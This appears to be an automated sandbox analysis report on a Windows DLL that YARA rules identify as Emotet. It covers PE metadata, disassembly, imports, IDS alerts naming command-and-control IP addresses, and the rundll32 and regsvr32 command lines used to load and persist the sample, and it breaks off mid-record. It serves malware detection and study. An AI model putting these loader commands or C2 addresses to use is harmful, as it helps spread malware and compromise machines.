Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.116057753988458
Encrypted:	false
SSDEEP:	6:kKyhk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:k9kPlE99SNxAhUeYlUSA/t
MD5:	42F749DB9E06B3D2302F217FCEE07E23
SHA1:	206C15AD14A992181A4E49E6C88677ABA213A026
SHA-256:	0E1185B8EF1B324881DF5F8DB63C90E09D5CB305EC89E25E744C5E680D7DBB70
SHA-512:	DEBA84D36D04BB9F7530B89DD0C24A39407CC0FCB76992B357F96B69FA1DF4DF3552E5AF9F4791BE20BA133E9A1022216BBC317C8A61A9A5442F037C61CC7A87
Malicious:	false
Preview:	p...... ......... _QL...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.087984594721417
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 95.65% Win32 EXE PECompact compressed (generic) (41571/9) 3.97% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EcJ8rbg.dll
File size:	417792
MD5:	8d7dd249f2a87f71b1588ce7d9855c80
SHA1:	a0776075300b15a404955bf669674d88df3a84ae
SHA256:	52faccb896886829a34782bd88a943f4e9a883ca5126aa147bbc177b9aaf8273
SHA512:	6fc389fa52959096874ab0fc95e5f4076c4e3bdb1a5c75d4b44eecb9fd6bb3be60c76ec68c0b41fe40c7b6f5663979f9805db8146751cb643d3bc9945ee4a526
SSDEEP:	6144:o1ju3jPam65ucnNgDoDUhuGGwKveueI4VKYjHyCAJOhrmBlDxqms9ujAJKedmL/:yMjcuDaUImZvStJorohvsMjmKe
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z'...F...F...F...I...F...I...F...F...D..9....F..9....F..9....F..9....F..9....F..9....F..Rich.F..................PE..L...k+.a...

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x10017b85
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x61E02B6B [Thu Jan 13 13:38:51 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	90add561a8bf6976696c056c199a41b8

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007F70D864E937h
call 00007F70D86566B8h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007F70D864E822h
pop ecx
retn 000Ch
push 00000000h
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
call 00007F70D8656720h
add esp, 14h
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x313c0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2fdcc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x3664	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x61000	0x3df4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cd60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x29000	0x440	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2fd44	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27f5e	0x28000	False	0.514996337891	data	6.66251942868	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x29000	0x8410	0x9000	False	0.308865017361	data	4.83038260414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x32000	0x2a9a0	0x27000	False	0.963572966747	data	7.93281036967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x5d000	0x3664	0x4000	False	0.274780273438	data	4.49622273105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x61000	0x8284	0x9000	False	0.33251953125	data	3.82081999119	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x5db08	0x134	data	Chinese	China
RT_CURSOR	0x5dc3c	0xb4	data	Chinese	China
RT_CURSOR	0x5dcf0	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x5de24	0x134	data	Chinese	China
RT_CURSOR	0x5df58	0x134	data	Chinese	China
RT_CURSOR	0x5e08c	0x134	data	Chinese	China
RT_CURSOR	0x5e1c0	0x134	data	Chinese	China
RT_CURSOR	0x5e2f4	0x134	data	Chinese	China
RT_CURSOR	0x5e428	0x134	data	Chinese	China
RT_CURSOR	0x5e55c	0x134	data	Chinese	China
RT_CURSOR	0x5e690	0x134	data	Chinese	China
RT_CURSOR	0x5e7c4	0x134	data	Chinese	China
RT_CURSOR	0x5e8f8	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x5ea2c	0x134	data	Chinese	China
RT_CURSOR	0x5eb60	0x134	data	Chinese	China
RT_CURSOR	0x5ec94	0x134	data	Chinese	China
RT_BITMAP	0x5edc8	0xb8	data	Chinese	China
RT_BITMAP	0x5ee80	0x144	data	Chinese	China
RT_ICON	0x5efc4	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Chinese	China
RT_ICON	0x5f2ac	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x5f3d4	0x33c	data	Chinese	China
RT_DIALOG	0x5f710	0xe2	data	Chinese	China
RT_DIALOG	0x5f7f4	0x34	data	Chinese	China
RT_STRING	0x5f828	0x54	data	Chinese	China
RT_STRING	0x5f87c	0x2c	data	Chinese	China
RT_STRING	0x5f8a8	0x82	data	Chinese	China
RT_STRING	0x5f92c	0x1d0	data	Chinese	China
RT_STRING	0x5fafc	0x164	data	Chinese	China
RT_STRING	0x5fc60	0x132	data	Chinese	China
RT_STRING	0x5fd94	0x50	data	Chinese	China
RT_STRING	0x5fde4	0x40	data	Chinese	China
RT_STRING	0x5fe24	0x6a	data	Chinese	China
RT_STRING	0x5fe90	0x1d6	data	Chinese	China
RT_STRING	0x60068	0x110	data	Chinese	China
RT_STRING	0x60178	0x24	data	Chinese	China
RT_STRING	0x6019c	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x601cc	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x601f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60204	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60218	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x6022c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60240	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60254	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60268	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x6027c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60290	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602a4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602b8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602cc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602e0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602f4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x60308	0x22	data	Chinese	China
RT_VERSION	0x6032c	0x2e0	data	Chinese	China
RT_MANIFEST	0x6060c	0x56	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileA, GetCPInfo, GetOEMCP, RtlUnwind, HeapReAlloc, GetCommandLineA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringW, GetStdHandle, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCurrentProcess, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, InterlockedDecrement, FreeResource, GetCurrentProcessId, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, lstrcmpA, GlobalDeleteAtom, GetModuleHandleA, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, CreateThread, CloseHandle, HeapFree, GetNativeSystemInfo, GetProcessHeap, HeapAlloc, FreeLibrary, GetProcAddress, LoadLibraryA, IsBadReadPtr, VirtualProtect, SetLastError, VirtualAlloc, VirtualFree, VirtualQuery, Sleep, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, MultiByteToWideChar, GetVersion, LCMapStringA, InterlockedExchange
USER32.dll	LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, GetMessageTime, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, UnhookWindowsHookEx, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, DestroyMenu, UnregisterClassA, GetMessagePos, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem, CheckMenuItem, PostQuitMessage, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, SetTimer, KillTimer, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, ShowWindow, EnableWindow, LoadIconA, PostMessageA, AdjustWindowRectEx
GDI32.dll	SetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
SHLWAPI.dll	PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WS2_32.dll	sendto, recvfrom, WSAStartup, inet_addr, htons, socket, bind, setsockopt, WSACleanup, closesocket, htonl

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10008af0

Version Infos

Description	Data
LegalCopyright	(C) 2014
InternalName	UDPTool
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	UDPTool
ProductVersion	1, 0, 0, 1
FileDescription	UDPTool Microsoft
OriginalFilename	UDPTool.EXE
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-14:40:27.956132	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49781	80	192.168.2.4	45.138.98.34
01/14/22-14:40:29.044036	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49782	8080	192.168.2.4	69.16.218.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 14:40:27.956131935 CET	49781	80	192.168.2.4	45.138.98.34
Jan 14, 2022 14:40:27.973161936 CET	80	49781	45.138.98.34	192.168.2.4
Jan 14, 2022 14:40:28.477164030 CET	49781	80	192.168.2.4	45.138.98.34
Jan 14, 2022 14:40:28.494388103 CET	80	49781	45.138.98.34	192.168.2.4
Jan 14, 2022 14:40:29.008362055 CET	49781	80	192.168.2.4	45.138.98.34
Jan 14, 2022 14:40:29.029999018 CET	80	49781	45.138.98.34	192.168.2.4
Jan 14, 2022 14:40:29.044035912 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:29.171293974 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:29.171632051 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:29.204123974 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:29.331598997 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:29.344496965 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:29.344521999 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:29.344671011 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:42.057385921 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:42.184777021 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:42.185447931 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:42.185626030 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:42.238903046 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:42.367160082 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:43.003623962 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:43.006452084 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:40:45.999952078 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:45.999980927 CET	8080	49782	69.16.218.101	192.168.2.4
Jan 14, 2022 14:40:46.000142097 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:42:17.908984900 CET	49782	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 14:42:17.909014940 CET	49782	8080	192.168.2.4	69.16.218.101

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3436 Parent PID: 5576

General

Start time:	14:40:08
Start date:	14/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll"
Imagebase:	0x8f0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5792 Parent PID: 3436

General

Start time:	14:40:08
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5608 Parent PID: 3436

General

Start time:	14:40:08
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\EcJ8rbg.dll
Imagebase:	0x10d0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.651219135.0000000003250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5104 Parent PID: 5792

General

Start time:	14:40:08
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.655430157.0000000002940000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6676 Parent PID: 3436

General

Start time:	14:40:09
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\EcJ8rbg.dll,DllRegisterServer
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658773887.00000000052D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658642834.00000000050E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658723299.0000000005171000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658517019.0000000004E81000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658095730.0000000002E20000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658582876.0000000004FB1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658747642.00000000052A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658668655.0000000005111000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658494027.0000000004E50000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658556614.0000000004F80000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.658697305.0000000005140000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6700 Parent PID: 5608

General

Start time:	14:40:09
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6728 Parent PID: 5104

General

Start time:	14:40:09
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658783740.0000000004A51000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.657974448.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658619486.0000000004860000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658811817.0000000004B80000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658757089.0000000004A20000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658656384.0000000004891000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658839063.0000000004BB1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658706042.00000000049C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658574169.0000000004761000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658548495.0000000004730000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.658732893.00000000049F1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2912 Parent PID: 6676

General

Start time:	14:40:12
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj",GacrURwyZJOcX
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.663246683.0000000002F90000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.663415496.00000000049F1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1320 Parent PID: 2912

General

Start time:	14:40:14
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
